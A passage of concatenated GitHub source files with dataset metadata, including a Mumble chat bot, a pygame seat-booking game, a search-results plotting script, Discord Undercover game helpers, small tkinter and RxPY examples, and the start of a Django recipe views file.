Will execute the\n given function if the \"Trigger\" String occurs in channel tex\".\n \n @param trigger: Text trigger, currently NO regexp support\n @type trigger: String\n @param function: Function to be called, Strings it returns are written back to the channel.\n @type function: Python Function \n \"\"\"\n self._textCallbacks.append((trigger, function)) \n \n def _readTotally(self, size):\n message = \"\"\n while len(message) < size:\n received = self.sock.recv(size - len(message))\n message += received\n if len(received) == 0:\n #print(\"Nothing received!\")\n return None\n return message\n \n def _sendTotally(self, message):\n while len(message) > 0:\n sent = self.sock.send(message)\n if sent < 0:\n return False\n message = message[sent:]\n return True\n \n def _packageMessageForSending(self, msgType, stringMessage):\n length = len(stringMessage)\n return struct.pack(\">HI\", msgType, length) + stringMessage\n \n def connectToServer(self):\n \"\"\"\n Really connects to the mumble server\n \"\"\"\n if self.sock == None: \n #\n # Guttenberg'd from eve-bot\n #\n self.sock = socket.socket(type=socket.SOCK_STREAM)\n self.sock = ssl.wrap_socket(self.sock, ssl_version=ssl.PROTOCOL_TLSv1)\n self.sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)\n \n self.sock.connect((self.host, self.port))\n \n pbMess = Mumble_pb2.Version()\n pbMess.release = \"1.2.0\"\n pbMess.version = 66048\n pbMess.os = platform.system()\n pbMess.os_version = \"mumblebot lol\"\n \n initialConnect = self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())\n \n pbMess = Mumble_pb2.Authenticate()\n pbMess.password = self.password\n pbMess.username = self.nickname\n if self.password != None:\n pbMess.password = self.password\n celtversion = pbMess.celt_versions.append(-2147483637)\n\n initialConnect += self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())\n\n if not self._sendTotally(initialConnect):\n print(\"couldn't send, wtf?\")\n return\n else:\n self.running = True\n thread.start_new_thread(self._pingLoop, ()) \n thread.start_new_thread(self._mainLoop, ())\n \n def sendTextMessage(self, Text):\n \"\"\"\n Send text message to channel\n \n @param Text: Text that should be sent to channel\n @type Text: String\n \"\"\"\n pbMess = Mumble_pb2.TextMessage()\n # print(self.session)\n pbMess.session.append(self.session)\n pbMess.channel_id.append(self.channel)\n # pbMess.tree_id.append(())\n pbMess.message = Text\n\n packet = self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())\n\n if not self._sendTotally(packet):\n print(\"couldnt't send text message, wtf?\")\n\n\n def _readPacket(self):\n meta = self._readTotally(6)\n \n \n if(meta != None):\n msgType, length = struct.unpack(\">HI\", meta)\n stringMessage = self._readTotally(length)\n #print (\"Message of type \"+str(msgType)+\" received!\")\n #print (stringMessage) \n \n if(not self.session and msgType == 5):\t\n message = self._parseMessage(msgType, stringMessage)\n self.session = message.session \n self._joinChannel()\n\n if(msgType == 1):\n print(stringMessage)\n sys.stdout.write(stringMessage[4:])\n if(msgType == 7):\n message = self._parseMessage(msgType, stringMessage)\n print(\"Channel \" + message.name + \": \" + str(message.channel_id))\n if(message.name == self.channel):\n self.channel = message.channel_id\n if(msgType == 11):\n message = self._parseMessage(msgType, stringMessage)\n for call in self._textCallbacks:\n 
                if(call[0] == message.message):\n                    self.sendTextMessage(call[1]()) \n            \n\n    def closeConnection(self):\n        \"\"\"\n        Closes the connection\n        \"\"\"\n        self.running = False\n\n    def _sendPing(self):\n        pbMess = Mumble_pb2.Ping()\n        pbMess.timestamp = (self._pingTotal * 5000000)\n        pbMess.good = 0\n        pbMess.late = 0\n        pbMess.lost = 0\n        pbMess.resync = 0\n        pbMess.udp_packets = 0\n        pbMess.tcp_packets = self._pingTotal\n        pbMess.udp_ping_avg = 0\n        pbMess.udp_ping_var = 0.0\n        pbMess.tcp_ping_avg = 50\n        pbMess.tcp_ping_var = 50\n        self._pingTotal += 1\n        packet = struct.pack(\">HI\", 3, pbMess.ByteSize()) + pbMess.SerializeToString() \n        \n        self.sock.send(packet)\n\n    def _joinChannel(self):\n        pbMess = Mumble_pb2.UserState()\n        pbMess.session = self.session\n        \n        pbMess.channel_id = self.channel\n        \n        if not self._sendTotally(self._packageMessageForSending(self._messageLookupMessage[type(pbMess)], pbMess.SerializeToString())):\n            print (\"Error sending join packet\")\n","repo_name":"waaaaargh/lolbot","sub_path":"mumbleConnection.py","file_name":"mumbleConnection.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
{"seq_id":"40582672434","text":"import paco.cftemplates\nfrom paco.application.res_engine import ResourceEngine\nfrom paco.core.yaml import YAML\n\nyaml=YAML()\nyaml.default_flow_style = False\n\nclass S3BucketResourceEngine(ResourceEngine):\n\n    def init_resource(self):\n        s3_ctl = self.paco_ctx.get_controller('S3')\n        # If an account was not set, use the network default\n        if self.resource.account == None:\n            account_ctx = self.account_ctx\n        else:\n            account_ctx = self.paco_ctx.get_account_context(account_ref=self.resource.account)\n        if self.resource.region:\n            bucket_region = self.resource.region\n        else:\n            bucket_region = self.aws_region\n        s3_ctl.init_context(\n            account_ctx,\n            bucket_region,\n            self.resource.paco_ref_parts,\n            self.stack_group,\n            self.stack_tags,\n        )\n        s3_ctl.add_bucket(self.resource)\n","repo_name":"waterbear-cloud/paco","sub_path":"src/paco/application/reseng_s3bucket.py","file_name":"reseng_s3bucket.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"}
{"seq_id":"37718831114","text":"import pygame, sys, time, random\nfrom pygame.surfarray import array3d\nimport random\nimport pickle\n## Sets up colors for the game using RGB Codes\nBLACK = pygame.Color(0, 0, 0)\nWHITE = pygame.Color(255, 255, 255)\nRED = pygame.Color(255, 0, 0)\nGREEN = pygame.Color(0, 255, 0) \nwith open('seats.pkl', 'rb') as f:\n    seats_coordinates = pickle.load(f)\n\nclass WorkerEnv():\n    \n    def __init__(self,frame_size_x,frame_size_y):\n        '''\n        Defines the initial game window size\n        '''\n        self.frame_size_x = frame_size_x\n        self.frame_size_y = frame_size_y\n        self.game_window = pygame.display.set_mode((self.frame_size_x, self.frame_size_y)) \n        self.reset()\n    \n    def reset(self):\n        '''\n        Resets the game, along with the default Worker size and spawning seat.\n        '''\n        #self.game_window.fill(BLACK)\n\n\n        self.Worker_pos = [100, 50]\n        self.Worker_body = [[100, 50], [100-10, 50], [100-(2*10), 50]]\n        self.seat_pos = self.spawn_seat()\n        \n        self.seat_spawn = True\n\n        self.direction = \"RIGHT\"\n        self.action = self.direction\n        self.score = 0\n        self.steps = 0\n        print(\"Game Reset.\")\n    \n    def change_direction(self,action,direction):\n        '''\n        Changes direction based on action input. 
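# --- Illustrative aside (my sketch): every Mumble TCP message in the
# connection class above is framed as a 6-byte big-endian header -- a 2-byte
# type and a 4-byte payload length, struct format ">HI" -- followed by the
# serialized protobuf, which is why _readPacket starts with _readTotally(6).
# A framing round-trip in isolation (the payload bytes are made up):
import struct

def frame(msg_type, payload):
    return struct.pack(">HI", msg_type, len(payload)) + payload

packet = frame(3, b'\x08\x01')   # type 3 = Ping in the message lookup table
msg_type, length = struct.unpack(">HI", packet[:6])
print(msg_type, length, packet[6:6 + length])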
\n Checkes to make sure Worker can't go back on itself.\n '''\n \n if action == 'UP' and direction != 'DOWN':\n direction = 'UP'\n if action == 'DOWN' and direction != 'UP':\n direction = 'DOWN'\n if action == 'LEFT' and direction != 'RIGHT':\n direction = 'LEFT'\n if action == 'RIGHT' and direction != 'LEFT':\n direction = 'RIGHT'\n \n return direction\n \n def move(self,direction,Worker_pos):\n '''\n Updates Worker_pos list to reflect direction change.\n '''\n \n if direction == 'UP':\n Worker_pos[1] -= 10\n if direction == 'DOWN':\n Worker_pos[1] += 10\n if direction == 'LEFT':\n Worker_pos[0] -= 10\n if direction == 'RIGHT':\n Worker_pos[0] += 10\n \n return Worker_pos\n \n def eat(self):\n '''\n Returns Boolean indicating if Worker has \"taken\" the red seat square\n '''\n return self.Worker_pos[0] == self.seat_pos[0] and self.Worker_pos[1] == self.seat_pos[1]\n \n \n def spawn_seat(self):\n '''\n Spawns seat in a random location on window size\n '''\n\n \n #seat_pos_1=random.choice(seats_coordinates)\n #return[seat_pos_1[0], seat_pos_1[1]]\n return [random.randrange(1, (self.frame_size_x//10)) * 10, random.randrange(1, (self.frame_size_y//10)) * 10]\n \n def human_step(self,event): \n '''\n Takes human keyboard event and then returns it as an action string\n '''\n \n action = None\n \n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n ################################################ \n ########## CONVERT KEYPRESS TO DIRECTION ###### \n ############################################## \n elif event.type == pygame.KEYDOWN:\n \n if event.key == pygame.K_UP:\n action = 'UP'\n if event.key == pygame.K_DOWN:\n action = 'DOWN'\n if event.key == pygame.K_LEFT:\n action = 'LEFT'\n if event.key == pygame.K_RIGHT:\n action = 'RIGHT'\n # Esc -> Create event to quit the game\n if event.key == pygame.K_ESCAPE:\n pygame.event.post(pygame.event.Event(pygame.QUIT))\n \n return action\n \n \n \n def display_score(self,color, font, size):\n '''\n Updates the score in top left\n '''\n score_font = pygame.font.SysFont(font, size)\n score_surface = score_font.render('Score : ' + str(self.score), True, color)\n score_rect = score_surface.get_rect()\n score_rect.midtop = (self.frame_size_x/10, 15)\n self.game_window.blit(score_surface, score_rect)\n \n def game_over(self):\n '''\n Checks if the Worker has touched the bounding box or itself\n '''\n \n # TOUCH BOX\n #if self.Worker_pos[0] < 0 or self.Worker_pos[0] > self.frame_size_x-10:\n # self.end_game()\n #if self.Worker_pos[1] < 0 or self.Worker_pos[1] > self.frame_size_y-10:\n # self.end_game()\n\n # TOUCH OWN BODY\n #for block in self.Worker_body[1:]:\n # if self.Worker_pos[0] == block[0] and self.Worker_pos[1] == block[1]:\n # self.end_game()\n \n\n\n def end_game(self):\n '''\n \n '''\n message = pygame.font.SysFont('arial', 45)\n message_surface = message.render('Game has Ended.', True, RED)\n message_rect = message_surface.get_rect()\n message_rect.midtop = (self.frame_size_x/2, self.frame_size_y/4)\n self.game_window.fill(BLACK)\n self.game_window.blit(message_surface, message_rect)\n self.display_score(RED, 'times', 20)\n pygame.display.flip()\n time.sleep(3)\n pygame.quit()\n sys.exit()\n\n\nWorker_env = WorkerEnv(1024,768)\n\n# This is technically a FPS Refresh rate\n# Higher number means faster refresh, thus faster Worker movement, meaning harder game play\ndifficulty = 10\n\n\n# FPS (frames per second) controller\nfps_controller = pygame.time.Clock()\n\n# Checks for errors encountered\ncheck_errors = pygame.init()\n\n\n# Initialise 
game window\npygame.display.set_caption('Worker Booker') \n\n############## Custom additons ################\nimport random\nimport pickle\nwith open('seats.pkl', 'rb') as f:\n seats_coordinates = pickle.load(f)\n\n#Create a display surface\nWINDOW_WIDTH = 1024\nWINDOW_HEIGHT = 768\n\n#Set FPS amnd clock\nFPS = 60\nclock = pygame.time.Clock()\n\n#Set game values\nVELOCITY = 5\n\n#Load images\nman_image = pygame.image.load(\"point_yellow.png\")\nman_rect = man_image.get_rect()\nman_rect.topleft = (25, 25)\n\ndesktop_image = pygame.image.load(\"point_blue.png\")\ndesktop_rect = desktop_image.get_rect()\n\ndesktop_pos_1=random.choice(seats_coordinates)\ndesktop_rect.center = (desktop_pos_1[0], desktop_pos_1[1])\n\ndesktop_image2 = pygame.image.load(\"point_red.png\")\ndesktop_rect2 = desktop_image2.get_rect()\ndesktop_pos_2=random.choice(seats_coordinates)\ndesktop_rect2.center = (desktop_pos_2[0], desktop_pos_2[1])\n\n###################################\n#The main game loop\nrunning = True\nwhile running:\n \n # Check Input from Human Step \n for event in pygame.event.get():\n \n Worker_env.action = Worker_env.human_step(event)\n \n #if event.type == pygame.QUIT:\n # running = False\n\n\n # Check for Direction change based on action\n Worker_env.direction = Worker_env.change_direction(Worker_env.action,Worker_env.direction)\n print(Worker_env.Worker_pos)\n\n####################à\n \n #Get a list of all keys currently being pressed down\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_LEFT] and man_rect.left > 0:\n man_rect.x -= VELOCITY\n if keys[pygame.K_RIGHT] and man_rect.right < WINDOW_WIDTH:\n man_rect.x += VELOCITY\n if keys[pygame.K_UP] and man_rect.top > 0:\n man_rect.y -= VELOCITY\n if keys[pygame.K_DOWN] and man_rect.bottom < WINDOW_HEIGHT:\n man_rect.y += VELOCITY \n\n #Check for collision between two rects\n if man_rect.colliderect(desktop_rect):\n print(\"HIT NOT DESIRED\")\n #Respawn in a new position\n desktop_pos_new_1=random.choice(seats_coordinates)\n \n desktop_rect.x = desktop_pos_new_1[0]\n desktop_rect.y = desktop_pos_new_1[1]\n\n #Check for collision between two rects\n if man_rect.colliderect(desktop_rect2):\n print(\"HIT DESIRED\")\n #Respawn in a new position\n desktop_pos_new_2=random.choice(seats_coordinates)\n desktop_rect2.x = desktop_pos_new_2[0]\n desktop_rect2.y = desktop_pos_new_2[1]\n\n\n\n\n######################\n\n #Update Worker Position\n Worker_env.Worker_pos = Worker_env.move(Worker_env.direction,Worker_env.Worker_pos)\n\n\n # Check to see if we ate some seat\n Worker_env.Worker_body.insert(0, list(Worker_env.Worker_pos))\n if Worker_env.eat():\n Worker_env.score += 1\n Worker_env.seat_spawn = False\n else:\n Worker_env.Worker_body.pop()\n\n # Check to see if we need to spawn new seat \n if not Worker_env.seat_spawn:\n Worker_env.seat_pos = Worker_env.spawn_seat()\n Worker_env.seat_spawn = True\n\n \n # Worker_env.game_window.fill(BLACK)\n\n bg = pygame.image.load(\"background.png\")\n #INSIDE OF THE GAME LOOP\n Worker_env.game_window.blit(bg, (0, 0))\n\n ################\n #Draw rectangles to represent the rect's of each object\n pygame.draw.rect(Worker_env.game_window, (0, 255, 0), man_rect, 1)\n pygame.draw.rect(Worker_env.game_window, (255, 255, 0), desktop_rect, 1)\n pygame.draw.rect(Worker_env.game_window, (255, 255, 0), desktop_rect2, 1)\n\n\n #Blit assets\n Worker_env.game_window.blit(man_image, man_rect)\n Worker_env.game_window.blit(desktop_image, desktop_rect)\n Worker_env.game_window.blit(desktop_image2, desktop_rect2)\n\n ##### \n 
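# --- Illustrative aside (my sketch): the collision handling above is the
# standard pygame pattern -- Rect.colliderect() to test overlap, then move
# the target rect to a new random seat. The same pattern in isolation
# (coordinates made up; pygame.Rect needs no display):
import random
import pygame

seats = [(40, 40), (120, 80), (200, 160)]
player = pygame.Rect(40, 40, 16, 16)
desk = pygame.Rect(0, 0, 16, 16)
desk.center = random.choice(seats)

if player.colliderect(desk):
    desk.center = random.choice(seats)   # respawn the desk on a hit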
# Draw the Worker\n \n for pos in Worker_env.Worker_body:\n pygame.draw.rect(Worker_env.game_window, GREEN, pygame.Rect(pos[0], pos[1], 10, 10))\n \n # Draw seat\n pygame.draw.rect(\n \n Worker_env.game_window, RED, \n pygame.Rect(Worker_env.seat_pos[0], \n Worker_env.seat_pos[1], 10, 10)\n \n )\n\n # Check if we lost\n Worker_env.game_over()\n \n \n\n Worker_env.display_score(BLACK, 'consolas', 20)\n # Refresh game screen\n pygame.display.update()\n # Refresh rate\n fps_controller.tick(difficulty)\n img = array3d(Worker_env.game_window) ","repo_name":"ruslanmv/How-to-create-custom-Reinforcement-Learning-environment","sub_path":"custom_game/basics_py/0_Custom_worker_env.py","file_name":"0_Custom_worker_env.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"42075759560","text":"import argparse\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\n\nfrom rlo import experiment_result\nfrom rlo import plotting\nfrom rlo import utils\nimport numpy as np\n\n\ndef average_of_counter(ctr):\n return sum([float(k) * v for k, v in ctr.items()]) / sum(ctr.values())\n\n\ndef plot_search_summary(outfile, title_suffix, events, alg):\n if alg not in [\"rollout\", \"astar\", \"beam\", \"hybrid\"]:\n raise ValueError(\"Unknown search algorithm {}\".format(alg))\n joined_events = plotting.join(\n [e for e in events if e[\"event\"] == \"rollout_end\" and \"eval_expr\" not in e],\n [e for e in events if e[\"event\"] == \"search\"],\n lambda r: (r[\"repetition\"], r[\"generation\"], r[\"expr\"]),\n ).values() # Discard the join keys\n\n x_axis_func = lambda r: r[\"generation\"]\n by_expr = utils.group_by(joined_events, lambda r: r[\"expr\"])\n # Two plots for each expression, one above the other so x-axes line up\n fig, axs = plt.subplots(\n 2, len(by_expr), figsize=[6 * len(by_expr), 6], squeeze=False,\n )\n assert len(axs) == 2 and len(axs[0]) == len(by_expr) and len(axs[1]) == len(by_expr)\n for ax1, ax2, (expr, logs) in zip(axs[0], axs[1], by_expr.items()):\n reps = plotting.pad_into_lists(\n utils.group_by(logs, lambda r: r[\"repetition\"]).values(), x_axis_func\n )\n # An generation may be a fixed number of varying expressions, so allow some exprs to be missing.\n reps = [\n plotting.carry_back_first(plotting.carry_previous_over_none(rep))\n for rep in reps\n ]\n x_vals = range(1, len(reps[0]) + 1)\n\n def plot(ax, fn, colnum, label):\n plotting.plot_with_confidence(\n ax,\n x_vals,\n [[fn(r) for r in rep] for rep in reps],\n plotting.colors(colnum),\n label=label,\n )\n\n expr_str = str(expr)\n expr_str = utils.format_expr(expr_str, 50)\n\n # First subplot: three axes.\n ax1.set_title(\"{} results\".format(expr_str))\n # - Min-cost-found on left-side log axis\n plot(ax1, lambda r: min([float(c) for c in r[\"final_costs\"]]), 1, \"best_cost\")\n start_costs = [r[\"expr_cost\"] for r in logs if \"expr_cost\" in r]\n if len(start_costs) > 0:\n ax1.plot(\n [0, max(x_vals)],\n [utils.single_elem(set(start_costs))] * 2,\n linestyle=\"--\",\n color=plotting.colors(1),\n linewidth=1,\n )\n ax1.set_yscale(\"log\")\n ax1.set_ylabel(\"best_cost\", color=plotting.colors(1))\n ax1.tick_params(axis=\"y\", colors=plotting.colors(1), which=\"both\")\n\n # - Average episode length on linear scale on rhs\n ax1b = ax1.twinx()\n plot(ax1b, lambda r: average_of_counter(r[\"episode_lengths\"]), 2, \"avg_ep_len\")\n ax1b.set_ylabel(\"avg_ep_len\", color=plotting.colors(2))\n ax1b.tick_params(\n 
axis=\"y\", colors=plotting.colors(2), which=\"both\", direction=\"in\"\n )\n\n # - Number of generated episodes on a separate log scale also on rhs\n ax1c = ax1.twinx()\n plot(\n ax1c, lambda r: sum(r[\"episode_lengths\"].values()), 3, \"#episodes\"\n ) # Unlike final_costs, episode_lengths works for both A* and Rollout.\n ax1c.set_yscale(\"log\")\n ax1c.set_ylabel(\"#episodes\", color=plotting.colors(3))\n ax1c.tick_params(\n axis=\"y\", colors=plotting.colors(3), which=\"both\", direction=\"out\"\n )\n ax1c.spines[\"right\"].set_position((\"axes\", 1.2))\n ax1c.spines[\"right\"].set_visible(True)\n\n # Second subplot: two axes\n ax2.set_title(\"{} details\".format(expr_str))\n # - One log scale, with positions evaluated and tl_cache_hits (and others IF A*)\n plot(ax2, lambda r: float(r[\"posns_evaluated\"]), 4, \"p_posns_evald\")\n plot(ax2, lambda r: float(r[\"tl_cache_hits\"]), 5, \"p_tl_cache\")\n ax2.set_ylabel(\"posns p_\") # This is the scale for all things beginning p_\n ax2.set_yscale(\n \"log\"\n ) # - One linear scale, with batch size (and others IF rollout)\n # - One linear scale, with batch size (and others IF rollout)\n ax2b = ax2.twinx()\n # np.float64 does not produce error with 0 division, for example np.float64(0)/float(0) gives nan, and float(0)/float(0) gives ZeroDivisionError\n plot(\n ax2b,\n lambda r: np.float64(r[\"posns_evaluated\"]) / float(r[\"batches\"]),\n 6,\n \"evals/batch\",\n )\n\n if alg in [\"astar\", \"beam\", \"hybrid\"]:\n # Only the one line on linear scale, so colour the axis and skip legend\n ax2b.set_ylabel(\"evals/batch\", color=plotting.colors(6))\n ax2b.tick_params(axis=\"y\", colors=plotting.colors(6), which=\"both\")\n legends, labels = [], []\n for col, key in enumerate(\n [\"generated\", \"expanded\", \"pruned\", \"unexplored\", \"merges\"],\n 7, # The starting index, i.e. 
color, after the lines plotted above\n ):\n plot(ax2, lambda r: float(r[key]), col, \"p_\" + key)\n else:\n assert alg == \"rollout\"\n # Add success rate and alpha to linear axis\n plot(ax2b, lambda r: float(r[\"alpha\"]), 7, \"alpha\")\n plot(ax2b, lambda r: float(r[\"success_rate\"]) * 10, 8, \"success/10\")\n ax2b.set_ylabel(\"e/b, alpha, succ\")\n # Include legends\n legends, labels = ax2b.get_legend_handles_labels()\n\n plt.xlabel(\"Generation\", fontsize=16)\n plt.suptitle(\"Search summary\" + title_suffix)\n # Add the p_* to the legend\n p_legends, p_labels = ax2.get_legend_handles_labels()\n plt.figlegend(\n legends + p_legends,\n labels + p_labels,\n loc=\"lower center\",\n ncol=len(legends + p_legends),\n )\n\n fig.tight_layout(rect=[0.0, 0.05, 1.0, 0.95])\n plt.savefig(outfile)\n\n\ndef plot_search_summary_from_config(config, events):\n plot_search_summary(\n plotting.format_figure_filename(config, \"search_summary.png\"),\n plotting.config_suffix(config),\n events,\n config[\"train_search\"],\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"run_id\",\n type=str,\n help=\"a run ID (e.g., 2019_01_06_13_15_48_13172) or path to a config.json file\",\n )\n args = parser.parse_args()\n\n config = experiment_result.load_config(args.run_id)\n logs = experiment_result.load_events_from_config(config)\n plot_search_summary_from_config(config, logs)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"microsoft/knossos-ksc","sub_path":"rlo/src/rlo/plot_search_summary.py","file_name":"plot_search_summary.py","file_ext":"py","file_size_in_byte":6687,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"26909311065","text":"import pytest\nfrom beginner_task import CsvToJson\n\n\n@pytest.fixture()\ndef instance():\n csvtojson = CsvToJson()\n return csvtojson\n\n\n# test to check if provided file is .csv:\ndef test_Extension(instance):\n csv_file = instance.data_file\n instance.main(csv_file=csv_file)\n if csv_file.lower().endswith('.csv'):\n print(\"Successful\")\n else:\n raise Exception(\"File Provided is not CSV\")\n\n\n# test to check if main function runs properly:\ndef test_function(instance):\n csv_file = instance.data_file\n try:\n instance.main(csv_file=csv_file)\n except NameError:\n print(\"CsvToJson Not Defined\")\n else:\n print(\"Successful!\")\n\n\n\n","repo_name":"akashgarje/d-mart-supplier","sub_path":"TestDmart.py","file_name":"TestDmart.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72211752108","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 28 10:14:08 2019\r\n\r\n@author: fatma\r\n\"\"\"\r\ndef blosum62_matrix():\r\n \r\n with open('blosum62.txt') as matrix_file:\r\n matrix = matrix_file.read()\r\n lines = matrix.strip().split('\\n')\r\n\r\n header = lines.pop(0)\r\n columns = header.split()\r\n matrix = {}\r\n\r\n for row in lines:\r\n entries = row.split()\r\n row_name = entries.pop(0)\r\n matrix[row_name] = {}\r\n for column_name in columns:\r\n matrix[row_name][column_name] = entries.pop(0)\r\n \r\n return(matrix)\r\n","repo_name":"mafattma/Classification-with-Kernel-methods","sub_path":"src/blosum62.py","file_name":"blosum62.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30463204405","text":"\n\n# Enkelt eksempel på bruk av 
input-funksjon:\n\nnavn = input(\"Hva er navnet ditt?\")\nprint(\"Hei\", navn)\n\n\n# Gjøre om input til et tall:\n\nalder = int(input(\"Hvor gammel er du?\"))\nårstall = 2016 - alder\n\n\n# sette sammen flere strenger til en streng:\n\nfødt_i_årstall = input(\"Ble du født i \" + str(årstall) + \"?\")\nprint(\"Du svarte:\", født_i_årstall)\n","repo_name":"aliccce/ITGKpython","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"2769729885","text":"from tkinter import *\n\nwin = Tk()\n\nwin.geometry(\"700x350\")\n\ndef on_click():\n label[\"text\"] = \"Code\"\n b[\"text\"] = \"Congrats! You are now a true programmer\"\n\nlabel = Label(win, text=\"Coffee\",\nfont=('Calibri 15 bold'))\nlabel.pack(pady=20)\n\nb = Button(win, text=\"Click to change Coffee to Code\", command=on_click)\nb.pack(pady=20)\n\nwin.mainloop()","repo_name":"narze/coffee-to-code","sub_path":"Python/malhaar2002.py","file_name":"malhaar2002.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"37"}{"seq_id":"17734751175","text":"import random\nimport asyncio\nimport json\nimport discord\nimport math\n\ndef decide_playing_order(players: dict):\n l = list(players.items())\n random.shuffle(l)\n while l[0][1]['role'] == 'white':\n random.shuffle(l)\n return dict(l)\n\nasync def eliminate(ctx, vote_outcome, players, players_data, alived_players_data):\n id_ = vote_outcome[0][0]\n index = alived_players_data[id_]['index']\n players_data[id_]['alive'] = False\n await ctx.send(\n f':skull: **{players[index].mention}** is eliminated with **{vote_outcome[0][1]}** votes!')\n return alived_players_data.pop(id_)\n\ndef check_game_over(civilians_alive_count, infiltrator_alive_count):\n \"\"\"\n return a tuple (game_over, winner_team)\n game_over is a boolean (True: Game ended, False: Game continues)\n winner_team represents the winning team, None if no one wins in this round\n \"\"\"\n if civilians_alive_count == 1:\n return True, 'Infiltrator'\n elif infiltrator_alive_count == 0:\n return True, 'Civillian'\n else:\n return False, None\n\nasync def handle_guess(self, member):\n def check(message):\n return message.author.id == member.id and isinstance(message.channel, discord.DMChannel)\n\n await member.send(\"**Guess the civilian's word and send it right here within 15 seconds :stopwatch:**\")\n try:\n msg = await self.bot.wait_for(event='message', timeout=15, check=check)\n except asyncio.TimeoutError:\n await member.send(\":stopwatch: Timeout! Try harder next time :wink:\")\n return False\n else:\n if msg.content.replace(' ', '').lower() == self.c_word.replace(' ', '').lower():\n await member.send(\"**:tada: Congrats! You got it RIGHT!** :white_check_mark::white_check_mark:\")\n return True\n else:\n await member.send(\"**:x: Wrong! 
Try harder next time :wink:**\")\n return False\n\ndef empty_vote_scheduler_file():\n empty_dict = {}\n with open('./databases/vote.json', 'w') as vote_file:\n json.dump(empty_dict, vote_file, indent=4)\n\n with open('./databases/scheduler.json', 'w') as schedule_file:\n json.dump(empty_dict, schedule_file, indent=4)\n\n# Given a number N, find and return all possible combination (a, b) where a>b and a+b=N\ndef find_possible_combinations(number_of_infiltrators: int) -> list:\n result = []\n for a in range(number_of_infiltrators+1):\n for b in range(a, number_of_infiltrators+1):\n if a + b == number_of_infiltrators:\n result.append((b, a))\n return result\n\ndef get_random_number_of_infiltrators(total_players: int):\n min = math.floor(total_players/4) + 1\n max = math.floor(total_players/2)\n return random.randint(min, max)\n\ndef randomCombinationInfiltrator(total_players):\n number_of_infiltrators = get_random_number_of_infiltrators(total_players)\n possible_combinations = find_possible_combinations(number_of_infiltrators)\n return random.choice(possible_combinations) # returns a tuple (Undercover, Mr.White)\n","repo_name":"wongcheehong/undercover_bot","sub_path":"function/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72280620587","text":"import rx\nfrom rx.subjects import Subject\nasyncio = rx.config['asyncio']\n\n\nclass TCPSubject(Subject):\n def __init__(self):\n super().__init__()\n\n @asyncio.coroutine\n def handle_request(self, reader, writer):\n data = yield from reader.readline()\n message = data.decode()\n addr = writer.get_extra_info('peername')\n print('Received {} from {}'.format(message.strip(), addr))\n self.on_next((message, addr[0]))\n\n print('Send: {}'.format(message.strip()))\n writer.write(data)\n yield from writer.drain()\n\n print('Close the client socket')\n writer.close()\n","repo_name":"geowa4/python3-docker-pex-rxpy-asyncio-experiments","sub_path":"experiment/tcpsubject.py","file_name":"tcpsubject.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"30496237679","text":"class Solution(object):\r\n def getRow(self, rowIndex):\r\n \"\"\"\r\n :type rowIndex: int\r\n :rtype: List[int]\r\n \"\"\"\r\n if rowIndex == 0:\r\n return [1]\r\n elif rowIndex == 1:\r\n return [1, 1]\r\n \r\n prev_row = [1,1]\r\n for i in range(2, rowIndex+2):\r\n cur_row = [1]\r\n for j in range(1, i-1):\r\n cur_row.append(prev_row[j-1] + prev_row[j])\r\n cur_row.append(1)\r\n prev_row = cur_row\r\n return cur_row","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0119_Pascal's_Triangle_II.py","file_name":"0119_Pascal's_Triangle_II.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42548042861","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import ListView\nfrom django.contrib.auth import login, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Count\n\nfrom taggit.models import Tag\n\nfrom .models import *\nfrom .forms import RecipeForm, UserLoginForm\n\n\n# class Index(ListView):\n# model = Recipe\n# template_name = 'recipe/index.html'\n# 
